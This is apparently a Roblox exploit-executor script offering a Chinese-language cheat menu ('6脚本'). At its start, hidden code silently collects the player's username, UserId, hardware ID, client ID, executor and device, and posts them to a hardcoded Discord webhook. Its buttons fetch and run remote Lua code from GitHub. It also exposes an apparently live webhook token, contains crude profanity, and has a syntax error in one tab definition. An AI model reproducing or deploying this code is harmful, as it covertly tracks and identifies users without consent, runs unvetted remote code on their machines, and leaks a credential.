    local Webhook = "https://discord.com/api/webhooks/1335644257381519442/8UXGUWpmLqFLIUs_PLF6mAMLLy1TMN3x-AqQaSeJPWNqr46ziCT6srjhY9v-Hoa2LPjB"

    local player = game:GetService"Players".LocalPlayer
    local joinTime = os.time() - (player.AccountAge*86400)
    local joinDate = os.date("!*t", joinTime)
    local alt = true
    _G.IsPc = false

    if game.UserInputService.KeyboardEnabled and game.UserInputService.MouseEnabled then
        _G.IsPc = "模拟器/PC"
    elseif game.UserInputService.TouchEnabled then
        _G.IsPc = "IOS/Android"
    else
        _G.IsPc = "IOS/Android/Unknown"
    end

    local executor = identifyexecutor() or "Unknown"
    local Thing = game:HttpGet(string.format("https://thumbnails.roblox.com/v1/users/avatar?userIds=%d&size=180x180&format=Png&isCircular=true", game.Players.LocalPlayer.UserId))
    Thing = game:GetService("HttpService"):JSONDecode(Thing).data[1]
    local AvatarImage = Thing.imageUrl
    local msg = {
       ["username"] = "bot",
       ["embeds"] = {
           {
               ["color"] = tonumber(tostring("0x32CD32")),
               ["title"] = "有人使用了6脚本",
               ["thumbnail"] = {
                ["url"] = AvatarImage,
               },
               ["fields"] = {
                    {
                       ["name"] = "名称(Name)",
                       ["value"] = "||"..player.Name.."||",
                       ["inline"] = true
                    },
                    {
                       ["name"] = "昵称(DisplayName)",
                       ["value"] = player.DisplayName,
                       ["inline"] = true
                    },
                    {
                       ["name"] = "UserId",
                       ["value"] = "||["..player.UserId.."](" .. tostring("https://www.roblox.com/users/" .. game.Players.LocalPlayer.UserId .. "/profile")..")||",
                       ["inline"] = true
                    },
                    {
                       ["name"] = "地图ID",
                       ["value"] = "["..game.PlaceId.."](" .. tostring("https://www.roblox.com/games/" .. game.PlaceId) ..")",
                       ["inline"] = true
                    },
                    {
                       ["name"] = "地图名称",
                       ["value"] = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name,
                       ["inline"] = true
                    },
                    {
                       ["name"] = "使用的注入器",
                       ["value"] = executor,
                       ["inline"] = true
                    },
                    {
                       ["name"] = "账号年龄",
                       ["value"] = player.AccountAge.."天",
                       ["inline"] = true
                    },
                    {
                       ["name"] = "加入日期",
                       ["value"] = joinDate.day.."/"..joinDate.month.."/"..joinDate.year,
                       ["inline"] = true
                    },
                    {
                        ["name"] = "HWID",
                        ["value"] = gethwid(),
                        ["inline"] = true
                    },
                    {
                        ["name"] = "客户端ID",
                        ["value"] = game:GetService("RbxAnalyticsService"):GetClientId(),
                        ["inline"] = false
                    },
                    {
                        ["name"] = "设备",
                        ["value"] = _G.IsPc,
                        ["inline"] = false
                    },
               }
           }
       }
    }
    
    request = http_request or request or HttpPost or syn.request
    request({
        Url = Webhook, 
        Method = "POST", 
        Headers = {["Content-Type"] = "application/json"}, 
        Body = game.HttpService:JSONEncode(msg)
    })
local OrionLib = loadstring(game:HttpGet("https://raw.githubusercontent.com/10h-pack/UI/refs/heads/main/OrionLib"))()
local Window = OrionLib:MakeWindow({Name = "6脚本主菜单", HidePremium = false, SaveConfig = true,IntroText = "loading", ConfigFolder = "4646646"})
task.wait(5)
game.StarterGui:SetCore("SendNotification", {
    Title = "6脚本",
    Text = "看到这个但是脚本没有打开，那就说明脚本已经停止了或者你被加入黑名单了",
    Duration = 14.4
})
local about = Window:MakeTab({
    Name = "声明",
    Icon = "rbxassetid://107567680655744",
    PremiumOnly = false
})
about:AddParagraph("该脚本为两人合作缝合而成(不全都是缝合)")
about:AddParagraph("使用该脚本封号不负责")
about:AddParagraph("小白&柳絮联合制作")
about:AddParagraph("脚本为免费脚本，请勿拿去圈钱，圈钱的人我操你妈——小白")
about:AddParagraph("此脚本是缝合脚本，永久更新")
about:AddParagraph("圈钱的人腻湿不湿愁奈拢,大庞茂,窝熙望腻遍乘哒旁冒——柳絮")

local Tab = Window:MakeTab({
    Name = "缝合脚本",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
Tab:AddButton({
	Name = "执行",
	Callback = function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/qwaszxcv85/6jiaoben/refs/heads/main/%E5%8D%A1%E5%AF%86%E6%A3%80%E6%B5%8B.lua"))()
	end
})   
local Tab = Window:MakeTab({
    Name = "自做脚本",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
Tab:AddButton({
	Name = "执行",
	Callback = function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/10h-pack/new-UI.345/refs/heads/main/6%E8%84%9A%E6%9C%AC%E8%87%AA%E5%81%9A%E5%8C%BA%E5%8A%A0%E5%AF%86.lua"))()
	end
})   
local Tab = Window:MakeTab({
    Name = "群",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
Tab:AddButton({
	Name = "复制群号",
	Callback = function()
	setclipboard("1023667706")
	local Tab = OrionLib:MakeNotification({
    Name = "6脚本",
    Content = "群号已复制",
    Image = "rbxassetid://107567680655744",
    Time = 2
})
	end
})   
Tab:AddButton({
	Name = "复制discord服务器名字",
	Callback = function()
	setclipboard("6脚本的服务器")
	local Tab = OrionLib:MakeNotification({
    Name = "6脚本",
    Content = "名称已复制",
    Image = "rbxassetid://107567680655744",
    Time = 2
})
	end
})   
local Tab = Window:MakeTab({
    Name = "反馈区"
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
Tab:AddButton({
	Name = "执行(小白制作,柳絮提供Webhook URL)",
	Callback = function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/qwaszxcv85/6jiaoben/refs/heads/main/%E5%8F%8D%E9%A6%88"))()
	end
})   
